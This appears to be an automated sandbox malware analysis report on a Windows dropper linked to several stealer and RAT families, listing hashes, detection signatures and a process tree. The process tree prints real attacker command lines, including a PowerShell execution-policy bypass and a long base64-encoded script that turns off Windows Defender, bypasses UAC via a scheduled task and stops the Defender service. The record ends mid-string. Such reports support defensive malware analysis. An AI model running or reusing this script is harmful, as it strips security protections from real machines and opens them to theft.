Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1572277
MD5:	9aba31b7a6b0d1afa4b290557ad5b6fb
SHA1:	09d2f60eef3abb4c20394fd8369b32846456c533
SHA256:	9b1fad1eb049d54f44103ba67be774b96d2cfd82eeb5ec72aadd20ec29d846f8
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected BrowserPasswordDump

Yara detected Credential Flusher

Yara detected Discord Recon

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected StormKitty Stealer

Yara detected VenomRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to log keystrokes (.Net Source)

Creates multiple autostart registry keys

Disable UAC(promptonsecuredesktop)

Disable Windows Defender real time protection (registry)

Disables UAC (registry)

Encrypted powershell cmdline option found

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Windows Service Tampering

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Uses whoami command line tool to query computer and username

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Execution of Powershell with Base64

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3172 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9ABA31B7A6B0D1AFA4B290557AD5B6FB)

skotes.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 9ABA31B7A6B0D1AFA4B290557AD5B6FB)

skotes.exe (PID: 6592 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9ABA31B7A6B0D1AFA4B290557AD5B6FB)

skotes.exe (PID: 1708 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9ABA31B7A6B0D1AFA4B290557AD5B6FB)

H3tyh96.exe (PID: 6728 cmdline: "C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe" MD5: 40F8C17C136D4DC83B130C9467CF6DCC)

RegSvcs.exe (PID: 7040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 6628 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cmd.exe (PID: 1856 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2928 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

ClientAny.exe (PID: 7160 cmdline: "C:\Users\user\AppData\Local\Temp\ClientAny.exe" MD5: 958CFC3E7730A66A05D6B8A49CE13D63)

WerFault.exe (PID: 6560 cmdline: C:\Windows\system32\WerFault.exe -u -p 7160 -s 996 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

powershell.exe (PID: 6976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBn